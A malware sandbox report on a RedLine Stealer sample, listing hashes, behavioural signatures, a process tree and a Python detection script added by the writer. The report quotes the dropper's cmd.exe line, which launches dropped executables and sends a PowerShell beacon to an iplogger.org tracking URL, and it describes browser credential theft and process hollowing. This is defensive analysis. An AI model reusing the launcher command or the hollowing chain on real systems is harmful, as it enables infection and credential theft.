Analysis
- max time kernel: 137s
- max time network: 148s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 21-03-2021 12:01
Static task: static1
Behavioral task: behavioral1
- Sample: 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe
- Resource: win7v20201028
Behavioral task: behavioral2
- Sample: 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe
- Resource: win10v20201028
General
- Target: 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe
- Size: 1.1MB
- MD5: f5366963764901262499c8021333f986
- SHA1: e57b794220e7a6184614ccd4a6ddcf99de7e0717
- SHA256: 38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f
- SHA512: 84cde9fd4846e839fee7171546c76253c321af4bc619e2b0b4830077b9d966251e36217f60c6da6c31258770fbf71284a1896a7bc5b388c609ebf18be9c048d6
Malware Config
Signatures
RedLine
  RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine Payload (2 IoCs)
  Processes (resource, yara_rule):
    behavioral2/memory/3224-53-0x0000000000400000-0x0000000000428000-memory.dmp  family_redline
    behavioral2/memory/3224-54-0x0000000000421DFE-mapping.dmp  family_redline
Blocklisted process makes network request (1 IoC)
  Processes (flow, pid, process):
    flow 14  PID 2212  powershell.exe
Executes dropped EXE (5 IoCs)
  Processes (pid, process):
    PID 3264  hello_C# (2).exe
    PID 3456  hello_C#.exe
    PID 2972  jayson.exe
    PID 3960  riv.exe
    PID 3224  jayson.exe
Loads dropped DLL (1 IoC)
  Processes (pid, process):
    PID 1812  38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe
Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials, cookies and autofill data.
Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
Legitimate hosting services abused for malware hosting/C2 (1 TTP)
  In this run: powershell.exe (PID 2212), started from the cmd.exe launcher command line, requests https://iplogger.org/1iRpu7 with Invoke-WebRequest.
Suspicious use of SetThreadContext (1 IoC)
  Processes (pid, process, target process):
    PID 2972 (jayson.exe) set thread context of PID 3224 (jayson.exe)
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). The sandbox's generic description for this signature calls it likely ransomware behaviour; for a RedLine sample, drive enumeration is more consistent with host profiling, and this report records no file-encryption activity.
Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes (pid, process):
    PID 2212  powershell.exe (3 events)
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes (token, pid, process):
    Token: SeDebugPrivilege  PID 2212  powershell.exe
    Token: SeDebugPrivilege  PID 3224  jayson.exe
Suspicious use of WriteProcessMemory (24 IoCs)
  Processes (source pid/process wrote to memory of target pid/process, event count):
    PID 1812 (38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe) wrote to memory of PID 3504 (cmd.exe), 3 events
    PID 3504 (cmd.exe) wrote to memory of PID 3264 (hello_C# (2).exe), 2 events
    PID 3504 (cmd.exe) wrote to memory of PID 3456 (hello_C#.exe), 2 events
    PID 3504 (cmd.exe) wrote to memory of PID 2972 (jayson.exe), 3 events
    PID 3504 (cmd.exe) wrote to memory of PID 3960 (riv.exe), 3 events
    PID 3504 (cmd.exe) wrote to memory of PID 2212 (powershell.exe), 3 events
    PID 2972 (jayson.exe) wrote to memory of PID 3224 (jayson.exe), 8 events
Processes (indentation shows parent/child depth)
C:\Users\Admin\AppData\Local\Temp\38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe (PID 1812)
  Command line: "C:\Users\Admin\AppData\Local\Temp\38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe"
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
    C:\Windows\SysWOW64\cmd.exe (PID 3504)
      Command line: "cmd" /c start "" "hello_C# (2).exe" & start "" "hello_C#.exe" & start "" "jayson.exe" & start "" "riv.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1iRpu7"
      - Suspicious use of WriteProcessMemory
        C:\Users\Admin\AppData\Local\Temp\hello_C# (2).exe (PID 3264)
          Command line: "hello_C# (2).exe"
          - Executes dropped EXE
        C:\Users\Admin\AppData\Local\Temp\hello_C#.exe (PID 3456)
          Command line: "hello_C#.exe"
          - Executes dropped EXE
        C:\Users\Admin\AppData\Local\Temp\jayson.exe (PID 2972)
          Command line: "jayson.exe"
          - Executes dropped EXE
          - Suspicious use of SetThreadContext
          - Suspicious use of WriteProcessMemory
            C:\Users\Admin\AppData\Local\Temp\jayson.exe (PID 3224)
              Command line: "{path}"
              - Executes dropped EXE
              - Suspicious use of AdjustPrivilegeToken
        C:\Users\Admin\AppData\Local\Temp\riv.exe (PID 3960)
          Command line: "riv.exe"
          - Executes dropped EXE
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 2212)
          Command line: powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1iRpu7"
          - Blocklisted process makes network request
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
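The process tree above, read together with the SetThreadContext, WriteProcessMemory and RedLine-payload signature tables, describes two detectable shapes: a cmd.exe launcher that fans out four dropped executables with `start ""` and then beacons with PowerShell Invoke-WebRequest to iplogger.org, and jayson.exe (PID 2972) re-spawning its own image with the literal command line "{path}" (which reads as an unsubstituted loader placeholder) and then calling SetThreadContext on the child, the process-hollowing pattern, with the family_redline yara hit landing in the child's 0x400000-0x428000 region rather than in the loader. The Python below is an added example and not part of the sandbox report; it encodes the report's process list, API events and yara dump names as constructed Sysmon-style records (the pid/ppid/image/cmdline field names and the ABUSED_HOSTS list are hypothetical) and runs both detections plus the yara-to-PID correlation over them.

```python
"""Detections for the launcher and process-hollowing chain in this report.

Added example: the records below are constructed from the report's process
tree and signature tables; the Sysmon-like field names are hypothetical.
"""
import re

TMP = r"C:\Users\Admin\AppData\Local\Temp"
SAMPLE = TMP + r"\38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f.exe"
CMD_3504 = ('"cmd" /c start "" "hello_C# (2).exe" & start "" "hello_C#.exe" '
            '& start "" "jayson.exe" & start "" "riv.exe" & powershell -command '
            '"Invoke-WebRequest -Uri https://iplogger.org/1iRpu7"')

# Constructed process-creation records (pid, ppid, image, cmdline) from the tree.
PROCESSES = [
    dict(pid=1812, ppid=None, image=SAMPLE, cmdline=f'"{SAMPLE}"'),
    dict(pid=3504, ppid=1812, image=r"C:\Windows\SysWOW64\cmd.exe", cmdline=CMD_3504),
    dict(pid=3264, ppid=3504, image=TMP + r"\hello_C# (2).exe", cmdline='"hello_C# (2).exe"'),
    dict(pid=3456, ppid=3504, image=TMP + r"\hello_C#.exe", cmdline='"hello_C#.exe"'),
    dict(pid=2972, ppid=3504, image=TMP + r"\jayson.exe", cmdline='"jayson.exe"'),
    dict(pid=3224, ppid=2972, image=TMP + r"\jayson.exe", cmdline='"{path}"'),
    dict(pid=3960, ppid=3504, image=TMP + r"\riv.exe", cmdline='"riv.exe"'),
    dict(pid=2212, ppid=3504,
         image=r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
         cmdline='powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1iRpu7"'),
]

# Constructed cross-process API records (api, caller pid, target pid) from the
# SetThreadContext and WriteProcessMemory tables (24 writes in total).
API_EVENTS = (
    [("WriteProcessMemory", 1812, 3504)] * 3
    + [("WriteProcessMemory", 3504, t) for t, n in
       ((3264, 2), (3456, 2), (2972, 3), (3960, 3), (2212, 3)) for _ in range(n)]
    + [("SetThreadContext", 2972, 3224)]
    + [("WriteProcessMemory", 2972, 3224)] * 8
)

# Memory-dump names the RedLine yara rule matched, as listed in the report.
YARA_HITS = [
    ("behavioral2/memory/3224-53-0x0000000000400000-0x0000000000428000-memory.dmp", "family_redline"),
    ("behavioral2/memory/3224-54-0x0000000000421DFE-mapping.dmp", "family_redline"),
]

ABUSED_HOSTS = {"iplogger.org"}  # hypothetical allow-list of tracker/hosting domains; only host seen here
WEBREQ_RE = re.compile(r'(?:Invoke-WebRequest|iwr|DownloadString)\b.*?(https?://([^/\s"]+)[^\s"]*)', re.I)
START_RE = re.compile(r'\bstart\s+""\s+"[^"]+"')
DUMP_RE = re.compile(r"/(?P<pid>\d+)-\d+-0x(?P<start>[0-9A-Fa-f]+)(?:-0x(?P<end>[0-9A-Fa-f]+))?-(?:memory|mapping)\.dmp$")


def detect_launcher(procs, min_started=2):
    """cmd.exe that launches several `start ""` children and has a PowerShell
    child fetching a URL on an abused hosting/tracking domain."""
    findings = []
    for p in procs:
        if not p["image"].lower().endswith(r"\cmd.exe"):
            continue
        started = len(START_RE.findall(p["cmdline"]))
        for ps in procs:
            if ps["ppid"] != p["pid"] or not ps["image"].lower().endswith(r"\powershell.exe"):
                continue
            m = WEBREQ_RE.search(ps["cmdline"])
            if m and m.group(2).lower() in ABUSED_HOSTS and started >= min_started:
                findings.append(dict(pid=p["pid"], children_started=started,
                                     beacon_pid=ps["pid"], beacon_url=m.group(1)))
    return findings


def detect_hollowing(procs, api_events):
    """Parent spawns its own image, then SetThreadContext + WriteProcessMemory
    on that child: the RunPE / process-hollowing shape seen for jayson.exe.
    Writes alone are not enough (CreateProcess also produces them)."""
    by_pid = {p["pid"]: p for p in procs}
    findings = []
    for child in procs:
        parent = by_pid.get(child["ppid"])
        if parent is None or parent["image"].lower() != child["image"].lower():
            continue
        pair = (parent["pid"], child["pid"])
        ctx = any(a == "SetThreadContext" and (s, t) == pair for a, s, t in api_events)
        writes = sum(1 for a, s, t in api_events if a == "WriteProcessMemory" and (s, t) == pair)
        if ctx and writes:
            findings.append(dict(parent=parent["pid"], child=child["pid"], image=child["image"],
                                 writes=writes, placeholder_cmdline=child["cmdline"].strip('"') == "{path}"))
    return findings


def correlate_yara(hollow_findings, yara_hits):
    """Attach yara family hits in memory dumps to the hollowed child PID, so the
    family label lands on the injected code rather than on the loader."""
    hollowed = {f["child"] for f in hollow_findings}
    out = []
    for name, rule in yara_hits:
        m = DUMP_RE.search(name)
        if not m or int(m.group("pid")) not in hollowed:
            continue
        end = int(m.group("end"), 16) if m.group("end") else None
        out.append(dict(pid=int(m.group("pid")), rule=rule, start=int(m.group("start"), 16), end=end))
    return out


if __name__ == "__main__":
    hollow = detect_hollowing(PROCESSES, API_EVENTS)
    for f in detect_launcher(PROCESSES) + hollow + correlate_yara(hollow, YARA_HITS):
        print(f)
```

The report itself shows why the hollowing rule keys on SetThreadContext plus a same-image parent/child rather than on WriteProcessMemory alone: the sandbox logs writes from cmd.exe into every one of its five children, which is ordinary CreateProcess behaviour, while only the jayson.exe pair also has a SetThreadContext event.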
Network
MITRE ATT&CK Enterprise v6
Downloads
The report lists 11 entries; identical hash sets are collapsed below with the number of times each appears.
- MD5: 0c2899d7c6746f42d5bbe088c777f94c
  SHA1: 622f66c5f7a3c91b28a9f43ce7c6cabadbf514f1
  SHA256: 5b0b99740cadaeff7b9891136644b396941547e20cc7eea646560d0dad5a5458
  SHA512: ab7a3409ed4b6ca00358330a3aa4ef6de7d81eb21a5e24bb629ef6a7c7c4e2a70ca3accfbc989ed6e495fdb8eb6203a26d6f2a37b2a5809af4276af375b49078
- MD5: d6b9f530e7e8ddebea8069a0d94ad38e (listed 4 times)
  SHA1: 28b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67
  SHA256: 3e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904
  SHA512: 2f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815
- MD5: 68f70e9545a6dbeecd3e2eba38c197ca (listed 3 times)
  SHA1: 5d0fdc7452e3af1c4d7b145256888687e5fd2a72
  SHA256: a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804
  SHA512: 99f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9
- MD5: bd96d90751fd507c3af0edbe0d596ec4 (listed 2 times)
  SHA1: eed0bb7626d328190c7de701c0071f9c4ad048ef
  SHA256: f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db
  SHA512: 5948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338
- MD5: 293165db1e46070410b4209519e67494
  SHA1: 777b96a4f74b6c34d43a4e7c7e656757d1c97f01
  SHA256: 49b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
  SHA512: 97012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19